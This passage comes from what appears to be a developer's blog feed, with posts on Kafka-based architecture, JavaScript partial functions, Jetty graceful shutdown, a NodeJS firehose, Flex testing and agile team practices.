I honestly could not figure this one out for the life of me. I thought the “solution” would help me figure out what it was asking for, but it seems that most people in the forums used the “converting the integer into a string” method. can someone explain the solution’s method instead?
def digit_sum(x):
    total = 0
    while x > 0:
        total += x % 10
        x = x // 10
        print x
    return total
I understand the method using strings but what is going on here? I’d just like a step by step explanation
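Since the question asks for a step-by-step walkthrough, here is a Python 3 rendering of the same function (the original forum code is Python 2, hence print x without parentheses), with the loop traced in comments:

```python
def digit_sum(x):
    total = 0
    while x > 0:
        total += x % 10   # x % 10 is the last (rightmost) digit of x
        x = x // 10       # integer division drops that last digit
        print(x)          # debugging aid from the original post
    return total

# Trace for digit_sum(1234):
#   x % 10 = 4, total = 4,  x becomes 123
#   x % 10 = 3, total = 7,  x becomes 12
#   x % 10 = 2, total = 9,  x becomes 1
#   x % 10 = 1, total = 10, x becomes 0 -> loop ends, return 10
```

In short: the modulo peels off one digit per pass, the floor division shrinks the number, and the loop stops when every digit has been consumed.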
Source: https://discuss.codecademy.com/t/digit-sum-alternate-solution/353040
I can't get the output to display the average, high, and low. Any hints?
/*. Use the following screen shots as a guide. */
#include <iostream>
using namespace std;

int main()
{
    double scores[75];
    int counter = -1;
    do {
        counter++;
        cout << "Please enter a score (enter -1 to stop): ";
        cin >> scores[counter];
    } while (scores[counter] >= 0);
}
I am very new to C++; I don't know where or how to add the high, low, and average in.
Any help would be greatly appreciated.
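Not a complete answer, but a hint in code form. After the do/while loop finishes, counter is the index where the -1 sentinel was stored, so counter itself is the number of valid scores. Helper functions like the following could then scan those entries; the names and structure here are an illustrative sketch, not the assignment's required layout:

```cpp
// Illustrative helpers only -- 'count' is the number of valid scores
// entered (the trailing -1 sentinel must not be included).
double averageOf(const double scores[], int count)
{
    double total = 0.0;
    for (int i = 0; i < count; i++)
        total += scores[i];        // accumulate, then divide once at the end
    return total / count;
}

double highOf(const double scores[], int count)
{
    double high = scores[0];       // start from the first score...
    for (int i = 1; i < count; i++)
        if (scores[i] > high)      // ...and keep the largest seen so far
            high = scores[i];
    return high;
}

double lowOf(const double scores[], int count)
{
    double low = scores[0];
    for (int i = 1; i < count; i++)
        if (scores[i] < low)       // keep the smallest seen so far
            low = scores[i];
    return low;
}
```

After your input loop you could then print cout << averageOf(scores, counter) and so on, guarding first against counter == 0 (no scores entered) to avoid dividing by zero.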
Thanks,
Mac
Source: https://www.daniweb.com/programming/software-development/threads/160191/one-dimensional-arrays-of-integers-problem
Dear community,
Could you point me to some documentation or explain how to incorporate a date range filter into an HCI search query?
I've got this, but I need a date range in there, e.g., the last 24 hours.
{
"indexName": "ECMReport",
"facetRequests": [
{
"fieldName": "HCI_namespace"
}
]
}
Hedde
Hi Hedde,
In the queryString itself, you can use this syntax for specific fields of type date:
dateField:[2017-10-19 TO *]
Examples:
"dateField:2000-11" – The entire month of November, 2000.
"dateField:2000-11T13" – Likewise but for an hour of the day (1300 to before 1400, i.e. 1pm to 2pm).
"dateField:[2000-11-01 TO 2014-12-01]" – The specified date range at a day resolution.
"dateField:[2014 TO 2014-12-01]" – From the start of 2014 till the end of the first day of December.
"dateField:[* TO 2014-12-01]" – From the earliest representable time thru till the end of the day on 2014-12-01.
"datefield:[1972-05-20T17:33:18.772Z TO *]" - From a specific instant in time to now
The "[" & "]" brackets indicate inclusive searches, and you can replace them on either side with "{" or "}" for exclusive ranges.
-Ben
Source: https://community.hitachivantara.com/thread/12398-hci-query-api-date-range-filter
These are chat archives for orbitjs/orbit.js
Store automatically when the ember-orbit addon is present. Unfortunately, ember addons include ember-data by default so we can’t expose it as service:store. It seems like the pragmatic way forwards for now is to expose it as service:orbitStore. Any thoughts?
// where topology is a preset for the co-ordinator
ENV.emberOrbit = {
  topology: {
    offline: 'localStorage',
    remote: 'rethinkdb'
  },
  sources: {
    localStorage: { namespace: 'appName' },
    rethinkdb: { host: '', username: 'abc', password: '123' },
    jsonApi: { host: '', username: 'abc', password: '123' }
  }
}
ENV.emberOrbit = {
  topology: {
    preset: 'optimisticui',
    offline: 'localStorage',
    remote: 'rethinkdb'
  },
  // ...
}
@dgeb I’ve got a bare bones demo running,
If you want to try it out you’ll need to manually link and
It’s a very bare bones slack clone at the moment, with just an in-memory store/cache. If you see a text box, just enter something and hit return. (rooms on the left, messages at the bottom).
I’m considering pulling orbit-rethinkdb together as I’ve already done the hard work of implementing mutations and listeners; we just need to pin down how orbitStore.liveQuery and source.liveQuery will work.
@dgeb thought I'd get the ball rolling with the liveQuery api.
We've discussed the API for the store already, I think we got to:
liveQuery = store.liveQuery()
liveQuery.subscribe(operation => {})
where liveQuery is the result from store.cache.liveQuery.
The question is how liveQueries are distributed to other sources.
LiveQueryable = {
  init(...args) {
    this._super(...args);
    Evented.extend(this);
  },

  liveQuery(query) {
    // not sure if any of the existing Evented methods match 'mapAll' here
    const promisedLiveQueries = Promise.all([
      this._liveQuery(query),
      ...this.mapAll('liveQuery', query)
    ]);

    return promisedLiveQueries.then(liveQueries => RxJS.Observable.merge(liveQueries));
  }
}

export default Source.extend({
  init(...args) {
    this._super(...args);
    LiveQueryable.extend(this);
  },

  _liveQuery(query) {
    // setup liveQuery for current source
  }
});
to wire up the sources
sourceA.on('liveQuery', sourceB.liveQuery);
sourceA.on('liveQuery', sourceC.liveQuery);
sourceC.on('liveQuery', sourceD.liveQuery);

new Orbit.TransformConnector(sourceA, sourceB);
new Orbit.TransformConnector(sourceA, sourceC);
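As a rough stand-alone illustration of the fan-out being sketched here — several sources each producing a stream of operations that merge into a single subscription — the snippet below uses tiny placeholder makeSource and merge helpers, not the real orbit.js or RxJS API:

```javascript
// Minimal subscribe/emit source, standing in for a per-source liveQuery.
function makeSource() {
  const handlers = [];
  return {
    subscribe(handler) { handlers.push(handler); },
    emit(operation) { handlers.forEach(h => h(operation)); }
  };
}

// Stand-in for Observable.merge: one subscription sees every source's events.
function merge(sources) {
  return {
    subscribe(handler) { sources.forEach(src => src.subscribe(handler)); }
  };
}

// Example: operations from two sources flow into a single handler.
const memory = makeSource();
const remote = makeSource();
const merged = merge([memory, remote]);

const seen = [];
merged.subscribe(op => seen.push(op));
memory.emit('addRecord');
remote.emit('replaceAttribute');
// seen is now ['addRecord', 'replaceAttribute']
```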
note the connectors are uni-directional, all results flow back to the store via the liveQueries (still thinking on the implications of this).
Source: https://gitter.im/orbitjs/orbit.js/archives/2016/01/07
We saw the use of the javax.xml.transform package and two of its subpackages in the output() method of Example 19-2. There it was used to perform an "identity transform," converting a DOM tree into the corresponding XML file. But transforming the format of an XML document is not the only purpose of these packages. They can also be used to transform XML content according to the rules of an XSL stylesheet. The code required to do this is remarkably simple; it's shown in Example 19-3. This example uses javax.xml.transform.stream to read files containing a source document and a stylesheet, and to write the output document to another file. JAXP can be even more flexible, however: the transform.dom and transform.sax subpackages allow the program to be rewritten to (for example) transform a document represented by a series of SAX parser events into a DOM tree, using a stylesheet read from a file.
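The "identity transform" mentioned above is worth a concrete look: a Transformer created with no stylesheet simply copies its input to its output, which is how a DOM tree (or any source) can be serialized back to XML. The small class below is a self-contained sketch; the class and method names are ours, not from the book:

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class IdentityTransform {
    // A Transformer obtained without a stylesheet performs the identity
    // transform: the output document is a copy of the input document.
    public static String identity(String xml) throws TransformerException {
        Transformer t = TransformerFactory.newInstance().newTransformer();
        StringWriter out = new StringWriter();
        t.transform(new StreamSource(new StringReader(xml)),
                    new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws TransformerException {
        System.out.println(identity("<log><record>test</record></log>"));
    }
}
```

Swapping the StreamSource/StreamResult pair for DOMSource/DOMResult or SAXSource gives exactly the mix-and-match flexibility described in the paragraph above.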
package je3.xml;
import java.io.*;
import javax.xml.transform.*;
import javax.xml.transform.stream.*;

/**
 * Transforms an input document to an output document using an XSLT stylesheet.
 * Usage: java XSLTransform input stylesheet output
 **/
public class XSLTransform {
    public static void main(String[] args) throws TransformerException {
        // Set up streams for input, stylesheet, and output.
        // These do not have to come from or go to files. We can also use the
        // javax.xml.transform.{dom,sax} packages to use DOM trees and streams of
        // SAX events as sources and sinks for documents and stylesheets.
        StreamSource input = new StreamSource(new File(args[0]));
        StreamSource stylesheet = new StreamSource(new File(args[1]));
        StreamResult output = new StreamResult(new File(args[2]));

        // Get a factory object, create a Transformer from it, and
        // transform the input document to the output document.
        TransformerFactory factory = TransformerFactory.newInstance();
        Transformer transformer = factory.newTransformer(stylesheet);
        transformer.transform(input, output);
    }
}
In order to use this example, you'll need an XSL stylesheet. A tutorial on XSL is beyond the scope of this chapter, but Example 19-4 shows one to get you started. This stylesheet is intended for processing the XML log files created by the java.util.logging package. For each <record> tag it encounters in the log file, it extracts the textual contents of the <sequence>, <date>, and <message> subtags, and combines them into a single line of output. This discards some of the log information, but shrinks and simplifies the log file, making it more human-readable.
<?xml version="1.0"?>
<xsl:stylesheet
<xsl:template
<xsl:value-of
<xsl:text>: </xsl:text>
<xsl:value-of
<xsl:text>: </xsl:text>
<xsl:value-of
</xsl:template>
</xsl:stylesheet> | http://books.gigatux.nl/mirror/javaexamples/0596006209_jenut3-chp-19-sect-3.html | CC-MAIN-2018-43 | en | refinedweb |
Pepijn Noltes edited comment on CELIX-77 at 10/15/13 7:20 PM:
--------------------------------------------------------------
Added md5 sum for the config_admin patch for grant identification
was (Author: pnoltes):
md5 sum for the config_admin patch to identify it for the grant.
> Configuration Admin Implementation - Beginning
> ----------------------------------------------
>
> Key: CELIX-77
> URL:
> Project: Celix
> Issue Type: New Feature
> Affects Versions: 0.0.1-incubating
> Reporter: Jorge SANCHEZ
> Priority: Minor
> Labels: patch
> Attachments: CELIX-77_config_admin.zip, CELIX-77_config_admin.zip.md5
>
>
> Hi all.
> I want to contribute a first humble implementation of the Configuration Admin service. Here are some comments on what this implementation is capable of; I recommend having some knowledge of the service to understand them.
> Currently the following public classes are implemented: ConfigurationAdmin, ManagedService, and Configuration. Not all the functionality of those classes is done; there is still work to do.
> From the point of view of the API's user, the current implementation deals only with ManagedService targets, and the user can create new Configuration objects, get an existing Configuration, or update the Configuration through the method configuration.update(), which triggers asynchronous callbacks to the ManagedService implementation. The concept of visibility between bundles and of bindings between ManagedService targets and Configurations is solved, but because the Configuration Permission class is not implemented yet, everything is allowed or authorized and nothing is restricted.
> The code of the service is quite clean, except for, perhaps, the "overwhelming of printf's" that I used to help me in the debugging and that I haven't removed yet. Another issue: there is a folder with some "dummy" examples that I use and modify constantly for debugging. I must admit that they are not very clean and I don't know if anyone can understand them, but I've decided to include them because someone may find them useful.
> Finally, as I noted, there is still much work to do, but I hope my contribution gives a first light in the development of the service.
> I'm a newbie with CELIX and I'm completely lost with the licenses, procedures, etc.; please, any input from you is welcome.
> I don't want to make this email longer to avoid confusion. Please, if any of you have any doubts, I'd be pleased to answer them; don't hesitate to write me.
> Friendly greetings,
> Jorge SANCHEZ
> P.S.: in the private directory there is a "framework patch"; I had to do it because I was missing some functions in the framework that I could not ignore or work around in a different way.
--
This message was sent by Atlassian JIRA
(v6.1#6144)
Source: http://mail-archives.apache.org/mod_mbox/celix-commits/201310.mbox/%3CJIRA.12663037.1376135759862.67920.1381864962298@arcas%3E
I am having an issue getting directions to return when using ModelBuilder or through a network service with ArcGIS Server. In 10.1 Desktop the directions work fine and are returned in the directions window. The model that I made works in 10, and without the directions it works in 10.1. When directions are set not to return (as false) in the network service, a route is returned as well. But in 10.1, both the model version of the route solve with directions and the network service return error 030020: "Failed to generate directions. Solve required prior to generating directions." Is this some sort of bug, or am I missing something?
Thanks,
Eric
Could you please elaborate briefly on the steps you take:
1) to build a model (what GP tools do you use and what is input/output)
2) to publish a GP service (which you create as I understood)
As a quick check though, I'd suggest running the test with the original (unmodified resources.xml) directions file, just to make sure it does not work with the original directions files either. This is because I've seen this error message in ArcGIS Desktop environments too when localized directions files have been used.
Source: https://community.esri.com/thread/52299-directions-in-101-not-working-with-modelbuilder-or-in-anbsp-network-service
Response Caching Middleware in ASP.NET Core
By Luke Latham and John Luo
View or download ASP.NET Core 2.1 sample code (how to download)
This article explains how to configure Response Caching Middleware in an ASP.NET Core app. The middleware determines when responses are cacheable, stores responses, and serves responses from cache. For an introduction to HTTP caching and the
ResponseCache attribute, see Response Caching.
Package
Reference the Microsoft.AspNetCore.App metapackage or add a package reference to the Microsoft.AspNetCore.ResponseCaching package.
Reference the Microsoft.AspNetCore.All metapackage or add a package reference to the Microsoft.AspNetCore.ResponseCaching package.
Add a package reference to the Microsoft.AspNetCore.ResponseCaching package.
Configuration
In Startup.ConfigureServices, add the middleware to the service collection.
public void ConfigureServices(IServiceCollection services)
{
    services.Configure<CookiePolicyOptions>(options =>
    {
        options.CheckConsentNeeded = context => true;
        options.MinimumSameSitePolicy = SameSiteMode.None;
    });

    services.AddResponseCaching();

    services.AddMvc()
        .SetCompatibilityVersion(CompatibilityVersion.Version_2_1);
}
Configure the app to use the middleware with the UseResponseCaching extension method, which adds the middleware to the request processing pipeline. The sample app adds a Cache-Control header to the response that caches cacheable responses for up to 10 seconds. The sample sends a Vary header to configure the middleware to serve a cached response only if the Accept-Encoding header of subsequent requests matches that of the original request. In the code example that follows, CacheControlHeaderValue and HeaderNames require a using statement for the Microsoft.Net.Http.Headers namespace.

public void Configure(IApplicationBuilder app, IHostingEnvironment env)
{
    app.UseResponseCaching();

    app.Use(async (context, next) =>
    {
        // For GetTypedHeaders, add: using Microsoft.AspNetCore.Http;
        context.Response.GetTypedHeaders().CacheControl =
            new Microsoft.Net.Http.Headers.CacheControlHeaderValue()
            {
                Public = true,
                MaxAge = TimeSpan.FromSeconds(10)
            };
        context.Response.Headers[Microsoft.Net.Http.Headers.HeaderNames.Vary] =
            new string[] { "Accept-Encoding" };

        await next();
    });

    app.UseMvc();
}
Response Caching Middleware only caches server responses that result in a 200 (OK) status code. Any other responses, including error pages, are ignored by the middleware.
Warning
Responses containing content for authenticated clients must be marked as not cacheable to prevent the middleware from storing and serving those responses. See Conditions for caching for details on how the middleware determines if a response is cacheable.
Options
The middleware offers three options for controlling response caching.
The following example configures the middleware to:
- Cache responses smaller than or equal to 1,024 bytes.
- Store the responses by case-sensitive paths (for example, /page1 and /Page1 are stored separately).
services.AddResponseCaching(options =>
{
    options.UseCaseSensitivePaths = true;
    options.MaximumBodySize = 1024;
});
VaryByQueryKeys
When using MVC/Web API controllers or Razor Pages page models, the ResponseCache attribute specifies the parameters necessary for setting the appropriate headers for response caching. The only parameter of the ResponseCache attribute that strictly requires the middleware is VaryByQueryKeys, which doesn't correspond to an actual HTTP header. For more information, see ResponseCache Attribute.
When not using the ResponseCache attribute, response caching can be varied with the VaryByQueryKeys feature. Use the ResponseCachingFeature directly from the IFeatureCollection of the HttpContext:

var responseCachingFeature = context.HttpContext.Features.Get<IResponseCachingFeature>();

if (responseCachingFeature != null)
{
    responseCachingFeature.VaryByQueryKeys = new[] { "MyKey" };
}
Using a single value equal to * in VaryByQueryKeys varies the cache by all request query parameters.
HTTP headers used by Response Caching Middleware
Response caching by the middleware is configured using HTTP headers.
Caching respects request Cache-Control directives
The middleware respects the rules of the HTTP 1.1 Caching specification. The rules require a cache to honor a valid Cache-Control header sent by the client. Under the specification, a client can make requests with a no-cache header value and force the server to generate a new response for every request. Currently, there's no developer control over this caching behavior when using the middleware because the middleware adheres to the official caching specification.
For more control over caching behavior, explore other caching features of ASP.NET Core. See the following topics:
- Cache in-memory
- Work with a distributed cache
- Cache Tag Helper in ASP.NET Core MVC
- Distributed Cache Tag Helper
Troubleshooting
If caching behavior isn't as expected, confirm that responses are cacheable and capable of being served from the cache. Examine the request's incoming headers and the response's outgoing headers. Enable logging to help with debugging.
When testing and troubleshooting caching behavior, a browser may set request headers that affect caching in undesirable ways. For example, a browser may set the Cache-Control header to no-cache or max-age=0 when refreshing a page. Tools that can explicitly set request headers are preferred for testing caching.
Conditions for caching
- The request must result in a server response with a 200 (OK) status code.
- The request method must be GET or HEAD.
- Terminal middleware, such as Static File Middleware, must not process the response prior to the Response Caching Middleware.
- The Authorization header must not be present.
- Cache-Control header parameters must be valid, and the response must be marked public and not marked private.
- The Pragma: no-cache header must not be present if the Cache-Control header isn't present, as the Cache-Control header overrides the Pragma header when present.
- The Set-Cookie header must not be present.
- Vary header parameters must be valid and not equal to *.
- The Content-Length header value (if set) must match the size of the response body.
- The IHttpSendFileFeature isn't used.
- The response must not be stale as specified by the Expires header and the max-age and s-maxage cache directives.
- Response buffering must be successful, and the size of the response must be smaller than the configured or default SizeLimit.
- The response must be cacheable according to the RFC 7234 specifications. For example, the no-store directive must not exist in request or response header fields. See Section 3: Storing Responses in Caches of RFC 7234 for details.
Note
The Antiforgery system for generating secure tokens to prevent Cross-Site Request Forgery (CSRF) attacks sets the Cache-Control and Pragma headers to no-cache so that responses aren't cached. For information on how to disable antiforgery tokens for HTML form elements, see ASP.NET Core antiforgery configuration.
Source: https://docs.microsoft.com/en-us/aspnet/core/performance/caching/middleware?view=aspnetcore-2.1
When writing a script, you don't always get it right the first time. That was a worthwhile lesson that our engineering team recently learned. Every month when Microsoft releases security updates, our engineering team must automate their installation. Generally, this is a simple task of running the patch executable with switches for silent remote deployment through HP's ProLiant Essentials Rapid Deployment Package (RDP), our deployment standard for Windows 2000 servers. However, there are times when a security update isn't a simple install. For example, that was the case with the security update commonly known as the graphics device interface (GDI) update associated with Microsoft Security Bulletin MS04-028 "Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution" (). The GDI security update affected various versions and editions of Windows and its components, including the Windows .NET Framework 1.1 and Framework 1.0 Service Pack 2 (SP2).
In the side-by-side execution model, Framework 1.1 and 1.0 coexist on a system, which lets developers use either or both versions in their applications. However, in most cases, it's simpler to upgrade to version 1.1 and not support side-by-side execution, provided the applications compiled for version 1.0 continue to function as expected. (In most cases, applications compiled for version 1.0 will continue to work properly on version 1.1. For more information about the versions, see "Versioning, Compatibility, and Side-by-Side Execution in the .NET Framework,".)
Because the GDI security update affected both Framework versions and we support side-by-side execution, it was essential for us to detect each server's Framework version and service pack level to ensure that the correct update would be applied. Moreover, because the Framework is an optional install in our Windows 2000 build, we also had to ensure that servers with no Framework installed didn't receive a GDI update. Thus, we decided to create a script that queries a server for its installed products and identifies the installed Framework versions and service pack levels if found. Although it took a few attempts to get it right, the result was worth it.
The First Attempt
There are multiple ways to confirm that a product is installed on a system. For example, you can read the registry, read an .ini file, or look for a specific file. Because both Framework versions were installed with Windows Installer (i.e., .msi packages) we found it easiest to use Windows Management Instrumentation's (WMI's) Win32_Product class and its properties. Using WMI's ExecQuery method to query the Win32_Product class returns instances of the Win32_Product class that represents products installed with Windows Installer. We then enumerated and compared the names of the products installed on a system with the display names of Framework 1.1 and Framework 1.0.
As Listing 1 shows, the script begins by declaring the computer name on which the script is to run. The strComputer variable stores this value. Because the script is to connect to the local computer, strComputer is set to a period. Next, the script calls the GetObject method to connect to WMI's root\cimv2 namespace, which contains the Win32_Product class.
Callout A in Listing 1 shows the heart of the script. This code stores the Windows Query Language (WQL) query in the wqlQuery variable, then calls WMI's ExecQuery method to run that query. Running the query returns a collection of objects, which the code assigns to the colProducts variable. Using a For Each...Next statement, the script iterates through the collection. The Select Case statement in the For Each...Next loop compares the name of the product (exposed by the Win32_Product class's Name property) with Microsoft .NET Framework 1.1 and Microsoft .NET Framework (English) to confirm if any or both Framework products are installed on the server.
The Second Attempt
The WQL query in callout A in Listing 1 is a general query that will return a collection of all installed .msi packages. Thus, the For Each...Next loop must iterate through the entire collection. Because we were interested in only querying for the Framework, we decided to optimize the query by modifying it to include a Where clause that limited the search to only the installed Framework products. Listing 2 shows the script with the optimized query.
We also optimized the ExecQuery method by including the wbemFlagReturnImmediately and wbemFlagForwardOnly flags, as callout A in Listing 2 shows. The wbemFlagReturnImmediately flag ensures that the WMI call doesn't wait for the query to complete before returning the result. The wbemFlagForwardOnly flag ensures that forward-only enumerators are returned. Forward-only enumerators are generally faster than bidirectional enumerators. (To learn more about the ExecQuery method and its parameters and flags, go to.)
The Third Attempt
Easier is not always better, as we learned after running the script in Listing 2. Although it was easiest to write a script using Win32_Product class, the class took up to 20 seconds to return the results, even with the optimized query. Because we were to run this script on more than 200 servers, the long wait wasn't acceptable. As an alternative, we decided to try a different approach: check the registry to confirm whether the Framework was installed on each server. The result is the script that Listing 3 shows.
Like the scripts in Listing 1 and Listing 2, the script in Listing 3 begins by setting the strComputerName variable to the local computer, but this is where the similarity ends. The differences begin with the WMI moniker statement in the GetObject call, which callout A in Listing 3 shows. In the other two scripts, the WMI moniker included the root\cimv2 namespace. For registry management, WMI provides the StdRegProv class. All WMI versions include and register the StdRegProv class, so WMI places this class in the root\default namespace by default. Thus, you have to connect to the root\default namespace (and not the root\cimv2 namespace) to use the StdRegProv provider.
StdRegProv exposes the GetStringValue method, which you can use to read the data from a registry entry whose value is of type REG_SZ. When you use the GetStringValue method, you must include four parameters in the following order:
Key tree root. The key tree root parameter specifies the target hive in the registry. Web Table 1 shows the UInt32 values (i.e., numeric constants) that represent the hives. The default hive is HKEY_LOCAL_MACHINE, which has a value of &H80000002.
Subkey. The subkey parameter specifies the registry path (not including the hive) to the registry entry that contains the value you want to retrieve.
Entry. The entry parameter specifies the name of the entry from which you're retrieving the value.
Out variable. The GetStringValue method reads the specified entry's value into a variable. You use the out variable parameter to specify the name of that variable.
All applications that can be uninstalled create a subkey under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall key. Thus, the Uninstall key is the base key under which the script looks for one of three subkeys: Microsoft .NET Framework (English), Microsoft .NET Framework Full v1.0.3705 (1033), or {CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}. Microsoft .NET Framework (English) and Microsoft .NET Framework Full v1.0.3705 (1033) both represent Framework 1.0. When I first downloaded Framework 1.0 a while back, the subkey created was named Microsoft .NET Framework (English). If you download and install Framework 1.0 now, the subkey name is Microsoft .NET Framework Full v1.0.3705 (1033). (Microsoft sometimes changes names to make them more meaningful.) The {CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1} subkey represents Framework 1.1.
As callout B in Listing 3 shows, the script uses a constant and two variables to provide the registry information. First, the script sets the HKEY_LOCAL_MACHINE constant to &H80000002. That constant is used for the GetStringValue method's key tree root parameter. Because the script is checking three subkeys under the Uninstall key, the script uses two variables, strKey and arrKeysToCheck, to specify the subkey parameter. The strKey variable holds the string SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. The arrKeysToCheck variable contains an array that includes three elements: the strings Microsoft .NET Framework (English), Microsoft .NET Framework Full v1.0.3705 (1033), and {CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}.
In Listing 3, the GetStringValue method's entry parameter is DisplayName. Remember that the Win32_Product class's Name property exposes the name of the products installed by Windows Installer. In the registry, the DisplayName entry stores the Name property's value. GetStringValue's last parameter is the strDisplayName variable.
When the script runs, it iterates through the arrKeysToCheck array and calls the StdRegProv's GetStringValue method for each element in the array, as callout C in Listing 3 shows. After GetStringValue passes the DisplayName entry's value to the strDisplayName variable, the script displays the value.
On completion, the GetStringValue method returns a 0 if successful or some other value if an error occurred. Because the Framework was an optional install in our environment, there are instances in which none of the three subkeys exist in the registry. Such instances could cause the GetStringValue method to fail and throw an error, which in turn could cause the script to fail. To avoid this problem, the On Error Resume Next statement appears before calling the For Each...Next loop to ensure that the script continues to run, even if GetStringValue throws an error.
Success!
The script in Listing 3 provided our engineering team with a viable, fast solution that determined whether Framework 1.1, Framework 1.0, or both were installed on a machine. However, we also needed to determine the Framework service pack levels. So, we decided to build on Listing 3 and add code to check for service pack information.
After some investigation, we discovered that Microsoft doesn't provide a direct means to detect Framework service pack levels. However, there are indirect means. For Framework 1.1, you can check the SP registry entry under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v1.1.4322 subkey. A value of 1 means that Framework 1.1 SP1 is installed.
Checking the registry won't work for Framework 1.0. Instead, Microsoft suggests that you check the version of the mscorcfg.dll file. Web Table 2 shows the correlation between the file versions and the service pack levels.
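The file-version check amounts to a table lookup. The Python sketch below renders that lookup logic; the version strings are the commonly cited mscorcfg.dll versions for Framework 1.0 and its service packs, included here as assumptions since Web Table 2 itself is not reproduced in this excerpt:

```python
# Assumed mapping (stand-in for Web Table 2): mscorcfg.dll file version
# -> .NET Framework 1.0 service pack level.
SP_BY_MSCORCFG_VERSION = {
    "1.0.3705.0": "Microsoft .NET Framework 1.0 found",
    "1.0.3705.209": "Microsoft .NET Framework 1.0 SP1 found",
    "1.0.3705.288": "Microsoft .NET Framework 1.0 SP2 found",
    "1.0.3705.6018": "Microsoft .NET Framework 1.0 SP3 found",
}

def service_pack_message(file_version):
    # Mirrors the Select Case in DetectFramework.vbs: known versions map to
    # a service-pack message; anything else falls through to a generic one.
    return SP_BY_MSCORCFG_VERSION.get(
        file_version,
        "Microsoft .NET Framework 1.0 found (service pack level unknown)")
```

The VBScript's Select Case over GetFileVersion's result plays exactly this role: a known version yields a specific message, and any other version falls through to a default.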
With the service pack information in hand, we started writing the DetectFramework.vbs script that Listing 4 shows. The first part of DetectFramework.vbs should look familiar. It uses the StdRegProv class's GetStringValue method to read the DisplayName entry's value into the strDisplayName variable. However, rather than display strDisplayName's value, the script starts to go through a series of embedded If...Then...Else and Select Case statements. If the GetStringValue method returns a value of 0 (i.e., the method was successful and thus a Framework version is installed), the script proceeds to a Select Case statement that determines whether strDisplayName's value is the string Microsoft .NET Framework 1.1 or the string Microsoft .NET Framework (English).
Microsoft .NET Framework 1.1. When strDisplayName contains the string Microsoft .NET Framework 1.1, the script checks the SP registry entry for the value of 1. To do so, it uses StdRegProv's GetDWORDValue method, which reads data from a registry entry whose value is of type REG_DWORD. Like GetStringValue, GetDWORDValue requires four parameters specifying the hive, the subkey name, the entry name, and the name of the variable that will store the entry's value.
After GetDWORDValue reads the SP entry's value, the Select Case statement at callout A in Listing 4 compares that value against the value of 1. When a match occurs, the script displays the message Microsoft .NET Framework 1.1 SP1 found. When a match doesn't occur, the script displays the message Microsoft .NET Framework 1.1 found. In other words, although Framework 1.1 was installed, SP1 wasn't.
Microsoft .NET Framework (English). When strDisplayName contains the string Microsoft .NET Framework (English), the script checks the version of the mscorcfg.dll file. The Microsoft Scripting Runtime Library's FileSystemObject object provides the GetFileVersion method, which returns the version of a given file. This method requires only one parameter: the path to the target file.
Before using GetFileVersion, though, the script checks for the file's existence. Although mscorcfg.dll must exist on the system if Framework 1.0 is installed, it's good scripting practice to check for a file's existence before attempting to get its version number. This practice ensures that the script won't stop with a File Not Found error at runtime.
To check for the mscorcfg.dll file's existence, the script uses the FileSystemObject object's FileExists method, as the code at callout B in Listing 4 shows. Like the GetFileVersion method, the FileExists method's only parameter is the path to the target file. If the file exists, the script calls the GetFileVersion method.
The Select Case statement at callout C in Listing 4 compares the version number that GetFileVersion returns with the four possible version numbers shown in Web Table 2. When a match occurs, the script displays the corresponding message that identifies the service pack level.
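The script's final decision is essentially a table lookup from file version to service-pack message. Here is the same idea sketched in Python for illustration; the version strings below are placeholders, since Web Table 2's actual values aren't reproduced in this article:

```python
# Map mscorcfg.dll file versions to .NET Framework 1.0 service pack messages.
# The version strings are hypothetical placeholders standing in for Web Table 2.
SERVICE_PACK_BY_VERSION = {
    "1.0.0000.0": "Microsoft .NET Framework 1.0 found",
    "1.0.0000.1": "Microsoft .NET Framework 1.0 SP1 found",
    "1.0.0000.2": "Microsoft .NET Framework 1.0 SP2 found",
    "1.0.0000.3": "Microsoft .NET Framework 1.0 SP3 found",
}

def service_pack_message(file_version):
    # Mirrors the script's Select Case: match a known version, or report
    # an unrecognized one when no case applies.
    return SERVICE_PACK_BY_VERSION.get(
        file_version, "Unknown mscorcfg.dll version: " + file_version)

print(service_pack_message("1.0.0000.1"))  # Microsoft .NET Framework 1.0 SP1 found
```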
To confirm that DetectFramework.vbs correctly detects the installed Framework version and service pack level, we tested the script by running it on a server installed with Framework 1.0 only, a server installed with Framework 1.1 only, a server installed with both versions, and a server that didn't have Framework installed. Further, after installing the latest service pack for each Framework version, we tested the script to ensure that we received the expected results. And expected results are what we received.
Challenging But Worth It
Although it took a lot of trial and error to create DetectFramework.vbs, it was worth the effort. And, as we like to say in engineering, a world without challenges would be a very boring world.
This notebook originally appeared as a post on the blog Pythonic Perambulations. The content is MIT licensed.
I just got home from my sixth PyCon, and it was wonderful as usual. If you weren't able to attend—or even if you were—you'll find a wealth of entertaining and informative talks on the PyCon 2017 YouTube channel.
Two of my favorites this year were a complementary pair of talks on Python dictionaries by two PyCon regulars: Raymond Hettinger's Modern Python Dictionaries: A confluence of a dozen great ideas and Brandon Rhodes' The Dictionary Even Mightier (a followup of his PyCon 2010 talk, The Mighty Dictionary). Both talks touch on a little-known feature of Python 3.6's dict implementation: the internal version number added by PEP 509.
Discussing it, Brandon said,
"[The version number] is internal; I haven't seen an interface for users to get to it..."
which, of course, I saw as an implicit challenge. So let's expose it!
In a post a few years ago, I showed how to use the
ctypes module to muck around in the internals of CPython's implementation at runtime, and I'll use a similar strategy here.
Briefly, the approach is to define a
ctypes.Structure object that mirrors the structure CPython uses to implement the type in question.
We can start with the base structure that underlies every Python object:
typedef struct _object {
    _PyObject_HEAD_EXTRA
    Py_ssize_t ob_refcnt;
    struct _typeobject *ob_type;
} PyObject;
A
ctypes wrapper might look like this:
import sys
assert (3, 6) <= sys.version_info < (3, 7)  # Valid only in Python 3.6

import ctypes

py_ssize_t = ctypes.c_ssize_t  # Almost always the case

class PyObjectStruct(ctypes.Structure):
    _fields_ = [('ob_refcnt', py_ssize_t),
